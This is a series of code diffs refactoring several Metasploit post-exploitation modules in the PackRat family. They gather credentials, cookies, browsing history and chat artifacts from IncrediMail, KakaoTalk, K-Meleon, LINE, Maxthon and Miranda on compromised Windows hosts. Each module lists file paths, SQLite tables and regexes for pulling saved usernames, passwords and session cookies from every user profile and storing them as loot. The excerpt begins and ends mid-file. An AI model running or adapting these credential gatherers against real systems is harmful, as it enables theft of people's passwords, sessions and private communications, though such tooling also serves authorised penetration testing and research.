+        credential_type: 'text',
+        regex_search: [
+          {
+            extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+            extraction_type: 'credentials',
+            regex: [
+              '(?i-mx:password.*)',
+              '(?i-mx:username.*)'
+            ]
+          },
+          {
+            extraction_description: 'searches for Email TO/FROM address',
+            extraction_type: 'Email addresses',
+            regex: [
+              '(?i-mx:to:.*)',
+              '(?i-mx:from:.*)'
+            ]
+          }
+        ]
+      }
+    ]
+  }.freeze
 
 class MetasploitModule < Msf::Post
   # this associative array defines the artifacts known to PackRat
   include Msf::Post::File
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
-
-  ARTIFACTS =
-    {
-      application: 'incredimail',
-      app_category: 'emails',
-      gatherable_artifacts: [
-        {
-          filetypes: 'email_logs',
-          path: 'LocalAppData',
-          dir: 'IM',
-          artifact_file_name: 'msg.iml',
-          description: 'IncrediMail sent and received emails',
-          credential_type: 'text',
-          regex_search: [
-            {
-              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
-              extraction_type: 'credentials',
-              regex: [
-                '(?i-mx:password.*)',
-                '(?i-mx:username.*)'
-              ]
-            },
-            {
-              extraction_description: 'searches for Email TO/FROM address',
-              extraction_type: 'Email addresses',
-              regex: [
-                '(?i-mx:to:.*)',
-                '(?i-mx:from:.*)'
-              ]
-            }
-          ]
-        }
-      ]
-    }.freeze
 
   def initialize(info = {})
     super(
@@ -81,7 +80,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
         OptEnum.new('ARTIFACTS', [
-          false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map do |k|
+          false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map do |k|
                                                           k[:filetypes]
                                                         end.uniq.unshift('All')
         ])

--- a/modules/post/windows/gather/credentials/kakaotalk.rb
+++ b/modules/post/windows/gather/credentials/kakaotalk.rb
@@ -9,58 +9,66 @@ class MetasploitModule < Msf::Post
   include Msf::Post::File
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
+  ARTIFACTS =
+    {
+      application: 'Kakao',
+      app_category: 'chats',
+      gatherable_artifacts: [
+        {
+          filetypes: 'logins',
+          path: 'LocalAppData',
+          dir: 'Kakao',
+          artifact_file_name: 'login_list.dat',
+          description: 'The email address used for login',
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:login_list.*)'
+              ]
+            }
+          ]
+        },
+        {
+          filetypes: 'files',
+          path: 'MyDocs',
+          dir: 'KakaoTalk Downloads',
+          artifact_file_name: '*',
+          description: 'Fiels that were downloaded to the host machine'
+        }
+      ]
+    }.freeze
 
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'KakaoTalk credential gatherer',
-                      'Description' => %q{
-      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-      This is a module that searches for KakaoTalk credentials on a windows remote host. KakaoTalk is a popular mobile messaging app most widely used in South Korea.
-      },
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": "Kakao",
-                          "app_category": "chats",
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": "logins",
-                              "path": "LocalAppData",
-                              "dir": "Kakao",
-                              "artifact_file_name": "login_list.dat",
-                              "description": "The email address used for login",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:login_list.*)"
-                                  ]
-                                }
-                              ]
-                            },
-							  {
-                              "filetypes": "files",
-                              "path": "MyDocs",
-                              "dir": "KakaoTalk Downloads",
-                              "artifact_file_name": "*",
-                              "description": "Fiels that were downloaded to the host machine"       
-                            }
-                          ]
-                        }
-          ))
+    super(
+      update_info(
+        info,
+        'Name' => 'KakaoTalk credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for KakaoTalk credentials on a windows remote host. KakaoTalk is a popular mobile messaging app most widely used in South Korea.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -68,11 +76,11 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:'gatherable_artifacts'].map { |k| k[:'filetypes'] }.uniq.unshift('All')])
-      ])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+      ]
+    )
   end
 
-	
   def run
     print_status('Filtering based on these selections:  ')
     print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
@@ -81,11 +89,9 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
-
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'
   end
 end
-

--- a/modules/post/windows/gather/credentials/kakaotalk.rb
+++ b/modules/post/windows/gather/credentials/kakaotalk.rb
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/kmeleon.rb
+++ b/modules/post/windows/gather/credentials/kmeleon.rb
@@ -10,116 +10,125 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
 
+  ARTIFACTS =
+    {
+      application: 'k-meleon',
+      app_category: 'browsers',
+      gatherable_artifacts: [
+        {
+          filetypes: 'logins',
+          path: 'AppData',
+          dir: 'K-Meleon',
+          artifact_file_name: 'signons.sqlite',
+          description: "K-Meleon's saved Username and Passwords",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'logins',
+              sql_column: 'username_value, action_url'
+            }
+          ]
+        },
+        {
+          filetypes: 'logins',
+          path: 'AppData',
+          dir: 'K-Meleon',
+          artifact_file_name: 'cert8.db',
+          description: "K-Melon's saved Username and Passwords",
+          credential_type: 'database'
+        },
+        {
+          filetypes: 'cookies',
+          path: 'AppData',
+          dir: 'K-Meleon',
+          artifact_file_name: 'cookies.sqlite',
+          description: "K-Meleon's Cookies",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'moz_cookies',
+              sql_column: 'baseDomain, host, name, path, value'
+            }
+          ]
+        },
+        {
+          filetypes: 'web_history',
+          path: 'AppData',
+          dir: 'K-Meleon',
+          artifact_file_name: 'formhistory.sqlite',
+          description: "K-Meleon's Visited websites ",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'moz_formhistory',
+              sql_column: 'value'
+            }
+          ]
+        },
+        {
+          filetypes: 'web_history',
+          path: 'AppData',
+          dir: 'K-Meleon',
+          artifact_file_name: 'places.sqlite',
+          description: "K-Meleon's Visited websites ",
+          credential_type: 'sqlite',
+          sql_search: [
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'moz_places',
+              sql_column: 'url'
+            },
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'moz_inputhistory',
+              sql_column: 'input'
+            },
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'moz_hosts',
+              sql_column: 'host'
+            },
+            {
+              sql_description: "Database Commands which exports Chrome's Login data",
+              sql_table: 'moz_keywords',
+              sql_column: 'keyword'
+            }
+          ]
+        }
+      ]
+    }.freeze
+
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Kmeleon credential gatherer',
-                      'Description' => %q{
-                       PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-      This is a module that searches for K-meleon credentials on a windows remote host.
-      },
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": "k-meleon",
-                          "app_category": "browsers",
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": "logins",
-                              "path": "AppData",
-                              "dir": "K-Meleon",
-                              "artifact_file_name": "signons.sqlite",
-                              "description": "K-Meleon's saved Username and Passwords",
-                              "credential_type": "sqlite",
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": "logins",
-                                  "sql_column": "username_value, action_url"
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "logins",
-                              "path": "AppData",
-                              "dir": "K-Meleon",
-                              "artifact_file_name": "cert8.db",
-                              "description": "K-Melon's saved Username and Passwords",
-                              "credential_type": "database"
-                            },
-                            {
-                              "filetypes": "cookies",
-                              "path": "AppData",
-                              "dir": "K-Meleon",
-                              "artifact_file_name": "cookies.sqlite",
-                              "description": "K-Meleon's Cookies",
-                              "credential_type": "sqlite",
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": "moz_cookies",
-                                  "sql_column": "baseDomain, host, name, path, value"
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "web_history",
-                              "path": "AppData",
-                              "dir": "K-Meleon",
-                              "artifact_file_name": "formhistory.sqlite",
-                              "description": "K-Meleon's Visited websites ",
-                              "credential_type": "sqlite",
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": "moz_formhistory",
-                                  "sql_column": "value"
-                                }
-                              ]
-                            },
-                            {
-                              "filetypes": "web_history",
-                              "path": "AppData",
-                              "dir": "K-Meleon",
-                              "artifact_file_name": "places.sqlite",
-                              "description": "K-Meleon's Visited websites ",
-                              "credential_type": "sqlite",
-                              "sql_search": [
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": "moz_places",
-                                  "sql_column": "url"
-                                },
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": "moz_inputhistory",
-                                  "sql_column": "input"
-                                },
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": "moz_hosts",
-                                  "sql_column": "host"
-                                },
-                                {
-                                  "sql_description": "Database Commands which exports Chrome's Login data",
-                                  "sql_table": "moz_keywords",
-                                  "sql_column": "keyword"
-                                }
-                              ]
-                            }
-                          ]
-                        }
-          ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Kmeleon credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for K-meleon credentials on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -127,8 +136,9 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:'gatherable_artifacts'].map { |k| k[:'filetypes'] }.uniq.unshift('All')])
-      ])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+      ]
+    )
   end
 
   def run
@@ -139,11 +149,9 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
-
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'
   end
 end
-

--- a/modules/post/windows/gather/credentials/kmeleon.rb
+++ b/modules/post/windows/gather/credentials/kmeleon.rb
@@ -136,7 +136,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/line.rb
+++ b/modules/post/windows/gather/credentials/line.rb
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/line.rb
+++ b/modules/post/windows/gather/credentials/line.rb
@@ -10,89 +10,98 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
 
+  ARTIFACTS =
+    {
+      application: 'line',
+      app_category: 'chats',
+      gatherable_artifacts: [
+        {
+          filetypes: 'images',
+          path: 'LocalAppData',
+          dir: 'LINE',
+          artifact_file_name: '*.png',
+          description: 'Image cache with png extension',
+          credential_type: 'chat_log'
+        },
+        {
+          filetypes: 'images',
+          path: 'LocalAppData',
+          dir: 'LINE',
+          artifact_file_name: '*.jpeg',
+          description: 'Image cache for jpg cache',
+          credential_type: 'chat_log'
+        },
+        {
+          filetypes: 'images',
+          path: 'LocalAppData',
+          dir: 'LINE\\Cache\\p',
+          artifact_file_name: '*',
+          description: 'Image cache for profile images of users',
+          credential_type: 'chat_log'
+        },
+        {
+          filetypes: 'images',
+          path: 'LocalAppData',
+          dir: 'LINE\\Cache\\g',
+          artifact_file_name: '*',
+          description: 'Image cache for group icons',
+          credential_type: 'chat_log'
+        },
+        {
+          filetypes: 'images',
+          path: 'LocalAppData',
+          dir: 'LINE\\Cache\\m',
+          artifact_file_name: '*',
+          description: 'Image cache for images sent through chat',
+          credential_type: 'chat_log'
+        },
+        {
+          filetypes: 'images',
+          path: 'LocalAppData',
+          dir: 'LINE\\Cache\\e',
+          artifact_file_name: '*',
+          description: 'Image cache for profile images sent by official accounts',
+          credential_type: 'chat_log'
+        },
+        {
+          filetypes: 'images',
+          path: 'LocalAppData',
+          dir: 'LINE\\Data\\pizza',
+          artifact_file_name: '*',
+          description: 'Image cache for profile images of users',
+          credential_type: 'chat_log'
+        }
+      ]
+    }.freeze
+
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'LINE credential gatherer',
-                      'Description' => %q{
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-      This is a module that searches for credentials in LINE desktop application on a windows remote host. LINE is the most popular Instant Messenger app in Japan.
-      },
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": "line",
-                          "app_category": "chats",
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": "images",
-                              "path": "LocalAppData",
-                              "dir": "LINE",
-                              "artifact_file_name": "*.png",
-                              "description": "Image cache with png extension",
-                              "credential_type": "chat_log"
-                            },
-                            {
-                              "filetypes": "images",
-                              "path": "LocalAppData",
-                              "dir": "LINE",
-                              "artifact_file_name": "*.jpeg",
-                              "description": "Image cache for jpg cache",
-                              "credential_type": "chat_log"
-                            },
-                            {
-                              "filetypes": "images",
-                              "path": "LocalAppData",
-                              "dir": "LINE\\Cache\\p",
-                              "artifact_file_name": "*",
-                              "description": "Image cache for profile images of users",
-                              "credential_type": "chat_log"
-                            },
-                            {
-                              "filetypes": "images",
-                              "path": "LocalAppData",
-                              "dir": "LINE\\Cache\\g",
-                              "artifact_file_name": "*",
-                              "description": "Image cache for group icons",
-                              "credential_type": "chat_log"
-                            },
-                            {
-                              "filetypes": "images",
-                              "path": "LocalAppData",
-                              "dir": "LINE\\Cache\\m",
-                              "artifact_file_name": "*",
-                              "description": "Image cache for images sent through chat",
-                              "credential_type": "chat_log"
-                            },
-                            {
-                              "filetypes": "images",
-                              "path": "LocalAppData",
-                              "dir": "LINE\\Cache\\e",
-                              "artifact_file_name": "*",
-                              "description": "Image cache for profile images sent by official accounts",
-                              "credential_type": "chat_log"
-                            },
-                            {
-                              "filetypes": "images",
-                              "path": "LocalAppData",
-                              "dir": "LINE\\Data\\pizza",
-                              "artifact_file_name": "*",
-                              "description": "Image cache for profile images of users",
-                              "credential_type": "chat_log"
-                            }
-                          ]
-                        }
-          ))
+    super(
+      update_info(
+        info,
+        'Name' => 'LINE credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for credentials in LINE desktop application on a windows remote host. LINE is the most popular Instant Messenger app in Japan.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -100,8 +109,9 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:'gatherable_artifacts'].map { |k| k[:'filetypes'] }.uniq.unshift('All')])
-      ])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+      ]
+    )
   end
 
   def run
@@ -112,11 +122,9 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
-
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'
   end
 end
-

--- a/modules/post/windows/gather/credentials/maxthon.rb
+++ b/modules/post/windows/gather/credentials/maxthon.rb
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/maxthon.rb
+++ b/modules/post/windows/gather/credentials/maxthon.rb
@@ -10,59 +10,68 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
 
+  ARTIFACTS =
+    {
+      application: 'maxthon',
+      app_category: 'browsers',
+      gatherable_artifacts: [
+        {
+          filetypes: 'logins',
+          path: 'AppData',
+          dir: 'Maxthon3',
+          artifact_file_name: 'MagicFill2.dat',
+          description: "Maxthon's sent and received emails",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        }
+      ]
+    }.freeze
+
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Maxthon credential gatherer',
-                      'Description' => %q{
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-        This is a module that searches for Maxthon credentials on a windows remote host.
-      },
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": "maxthon",
-                          "app_category": "browsers",
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": "logins",
-                              "path": "AppData",
-                              "dir": "Maxthon3",
-                              "artifact_file_name": "MagicFill2.dat",
-                              "description": "Maxthon's sent and received emails",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            }
-                          ]
-                        }
-          ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Maxthon credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for Maxthon credentials on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -70,8 +79,9 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:'gatherable_artifacts'].map { |k| k[:'filetypes'] }.uniq.unshift('All')])
-      ])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+      ]
+    )
   end
 
   def run
@@ -82,11 +92,9 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
-
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'
   end
 end
-

--- a/modules/post/windows/gather/credentials/miranda.rb
+++ b/modules/post/windows/gather/credentials/miranda.rb
@@ -11,58 +11,66 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::Packrat
 
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Miranda credential gatherer',
-                      'Description' => %q{
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-      This is a module that searches for Miranda credentials on a windows remote host.
-      },
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": "miranda",
-                          "app_category": "chats",
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": "logins",
-                              "path": "AppData",
-                              "dir": "Miranda",
-                              "artifact_file_name": "Home.dat",
-                              "description": "Miranda's multi saved chat protocol Username, (coded Passwords)",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            }
-                          ]
-                        }
-          ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Miranda credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for Miranda credentials on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
